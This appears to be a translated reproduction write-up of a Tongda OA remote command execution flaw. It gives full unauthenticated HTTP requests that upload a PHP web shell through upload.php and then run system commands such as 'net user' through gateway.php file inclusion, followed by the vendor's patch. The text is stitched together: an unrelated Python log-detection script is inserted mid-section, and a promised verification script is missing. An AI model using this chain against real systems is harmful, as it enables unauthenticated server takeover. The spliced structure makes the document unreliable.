Tongda OA "login not allowed from this IP" _ Tongda OA command execution vulnerability reproduction
Tongda OA - Command Execution
1. Environment
Installation files:
Link: https://pan.baidu.com/s/1Y78Zs-7Igi4MRE0J_Dp-dQ Extraction code: 2b3i
2. Vulnerability verification
Arbitrary file upload vulnerability: /ispirit/im/upload.php
Local file inclusion vulnerability: /ispirit/interface/gateway.php
Neither of these paths requires login authentication.
Capture the request in Burp and modify it to upload the file:
POST /ispirit/im/upload.php HTTP/1.1
Host: 127.0.0.1:8080
Content-Length: 658
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypyfBh1YB4pV8McGB
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,zh-HK;q=0.8,ja;q=0.7,en;q=0.6,zh-TW;q=0.5
Cookie: PHPSESSID=123
Connection: close

------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="UPLOAD_MODE"

2
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="P"

123
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="DEST_UID"

1
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="ATTACHMENT"; filename="jpg"
Content-Type: image/jpeg

<?php
$command=$_POST['cmd'];
$wsh = new COM('WScript.shell');
$exec = $wsh->exec("cmd /c ".$command);
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
?>
------WebKitFormBoundarypyfBh1YB4pV8McGB--
Upload succeeded.
Check the response:
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 18 Mar 2020 12:12:58 GMT
Content-Type: text/html; charset=gbk
Connection: close
Vary: Accept-Encoding
Set-Cookie: PHPSESSID=123; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Frame-Options: SAMEORIGIN
Content-Length: 41

+OK [vm]143263@2003_1787828218|jpg|0[/vm]
The filename used for the file inclusion is 2003/1787828218.jpg.
Next, modify the request so that it includes the file name from above and executes a system command:
POST /mac/gateway.php HTTP/1.1
Host: 127.0.0.1:8080
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.21.0
Content-Length: 74
Content-Type: application/x-www-form-urlencoded

json={"url":"/general/../../attach/im/2003/1787828218.jpg"}&cmd=net user
Command executed successfully.
The verification above was done by capturing and modifying requests in Burp.
Below, the same verification via a Python script:
Command execution succeeded.
3. Patch code
Patch for /ispirit/im/upload.php
Original code:
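As an added example (not code from the original post), a small Python log-correlation check for the chain described above: a successful POST to /ispirit/im/upload.php followed shortly by a POST to gateway.php from the same client, which on a fresh Tongda OA instance should never be needed by a legitimate user. The access log lines, client addresses and the five-minute window are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample of combined-format access log lines (not from the original
# post; client addresses are RFC 5737 documentation ranges). The first pair mimics
# the upload-then-include chain within seconds; the second pair is an hour apart;
# the last line is ordinary traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [18/Mar/2020:12:12:58 +0000] "POST /ispirit/im/upload.php HTTP/1.1" 200 41 "-" "Mozilla/5.0"
203.0.113.7 - - [18/Mar/2020:12:13:02 +0000] "POST /mac/gateway.php HTTP/1.1" 200 512 "-" "python-requests/2.21.0"
198.51.100.9 - - [18/Mar/2020:12:20:00 +0000] "POST /ispirit/im/upload.php HTTP/1.1" 200 41 "-" "Mozilla/5.0"
198.51.100.9 - - [18/Mar/2020:13:20:00 +0000] "POST /ispirit/interface/gateway.php HTTP/1.1" 200 30 "-" "Mozilla/5.0"
192.0.2.4 - - [18/Mar/2020:12:30:00 +0000] "GET /general/index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
UPLOAD_PATH = "/ispirit/im/upload.php"
# Both gateway paths mentioned in the write-up are treated as the include endpoint.
GATEWAY_PATHS = {"/ispirit/interface/gateway.php", "/mac/gateway.php"}


def parse_line(line):
    """Return (ip, datetime, method, path, status), or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, m.group("method"), m.group("path").split("?")[0], int(m.group("status"))


def find_upload_then_include(log_text, window_seconds=300):
    """Flag clients that POST to upload.php and then POST to gateway.php within the window."""
    uploads = defaultdict(list)  # ip -> timestamps of successful upload POSTs
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, method, path, status = rec
        if method == "POST" and path == UPLOAD_PATH and status == 200:
            uploads[ip].append(ts)
        elif method == "POST" and path in GATEWAY_PATHS:
            # Any earlier upload from the same client inside the window makes the pair suspicious.
            if any(0 <= (ts - t).total_seconds() <= window_seconds for t in uploads[ip]):
                alerts.append((ip, path, ts.isoformat()))
    return alerts
```

Widening the window trades missed slow chains against noise from legitimate IM attachment uploads, so tune it against real traffic before alerting on it.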
set_time_limit(0);
$P = $_POST['P'];
if (isset($P) || $P != '') {
ob_start();
include_once 'inc/session.php';
session_id($P);
session_start();
session_write_close();
} else {
include_once './auth.php';
}
Patched code:
The else branch is removed; ./auth.php is now included unconditionally.
//lp 2012/11/29 1:26:01 compatibility for clients that submit data without a session
if(isset($P) || $P!="")
{
ob_start();
include_once("inc/session.php");
session_id($P);
session_start();
session_write_close();
}
include_once("./auth.php");
auth.php
This is where the login check is actually performed:
include_once 'inc/session.php';
session_start();
session_write_close();
include_once 'inc/conn.php';
include_once 'inc/utility.php';
ob_start();
if (!isset($_SESSION['LOGIN_USER_ID']) || $_SESSION['LOGIN_USER_ID'] == '' || !isset($_SESSION['LOGIN_UID']) || $_SESSION['LOGIN_UID'] == '') {
sleep(1);
if (!isset($_SESSION['LOGIN_USER_ID']) || $_SESSION['LOGIN_USER_ID'] == '' || !isset($_SESSION['LOGIN_UID']) || $_SESSION['LOGIN_UID'] == '') {
echo '-ERR ' . _('用戶未登陸');
exit;
}
}
4. References
https://github.com/jas502n/OA-tongda-RCE
https://www.cnblogs.com/potatsoSec/p/12516234.html